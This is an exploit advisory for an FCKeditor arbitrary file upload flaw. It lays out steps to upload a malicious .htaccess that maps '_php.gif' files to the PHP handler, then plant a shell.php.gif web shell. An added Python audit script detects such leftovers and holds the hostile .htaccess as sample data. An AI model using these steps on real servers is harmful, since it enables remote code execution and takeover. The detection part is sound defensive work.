FCKeditor upload vulnerability (all PHP versions)
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:

code:
    <FilesMatch "_php.gif">
    SetHandler application/x-httpd-php
    </FilesMatch>
2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now reachable on the server.
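The sequence above works only because Apache honours a .htaccess inside a directory the uploader can write to, and because the rename keeps the PHP extension inside the filename. As an added defender-side audit (not part of the original advisory, and not FCKeditor code), the Python below walks a stored upload tree and flags both leftovers: a .htaccess carrying handler or type directives, and names with an embedded PHP extension, including the `_php.` form produced by the rename. The paths and file contents are constructed sample data.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of a stored upload tree ({relative path: bytes}); not a real capture.
SAMPLE_UPLOADS: Dict[str, bytes] = {
    "userfiles/image/photo.gif": b"GIF89a...",
    "userfiles/image/.htaccess": (
        b'<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'
    ),
    "userfiles/image/shell_php.gif": b"GIF89a...",
    "userfiles/file/report.pdf": b"%PDF-1.4",
    "userfiles/file/php_manual.pdf": b"%PDF-1.4",
}

# Directives that change how Apache serves or executes a file. Any of them in a
# .htaccess that an uploader could have written is a finding on its own.
HANDLER_DIRECTIVES = re.compile(
    r"^\s*(?:SetHandler|AddHandler|AddType|ForceType|php_(?:admin_)?(?:value|flag))\b",
    re.IGNORECASE | re.MULTILINE,
)

# An executable extension anywhere in the name: "shell.php", "shell.php.gif" and the
# renamed "shell_php.gif" all match; "php_manual.pdf" does not (php is followed by "_").
EXEC_EXT = re.compile(r"(?:^|[._])(?:php\d?|phtml|phar)(?:\.|$)", re.IGNORECASE)

def classify_upload(path: str, content: bytes) -> Optional[str]:
    """Return a reason if the stored file should not exist in an upload tree, else None."""
    name = path.rsplit("/", 1)[-1]
    if name.lower() == ".htaccess":
        text = content.decode("utf-8", errors="replace")
        if HANDLER_DIRECTIVES.search(text):
            return "htaccess sets a handler/type directive"
        return "htaccess present in upload tree"
    if EXEC_EXT.search(name):
        return "executable extension embedded in filename"
    return None

def audit_uploads(entries: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Apply classify_upload to every stored file; returns (path, reason) per finding."""
    findings: List[Tuple[str, str]] = []
    for path in sorted(entries):
        reason = classify_upload(path, entries[path])
        if reason is not None:
            findings.append((path, reason))
    return findings

if __name__ == "__main__":
    for path, reason in audit_uploads(SAMPLE_UPLOADS):
        print(f"{path}: {reason}")
```

Running it against a real tree means replacing SAMPLE_UPLOADS with a walk of the upload directory; the same classify_upload check can also be applied to incoming names before the file is written.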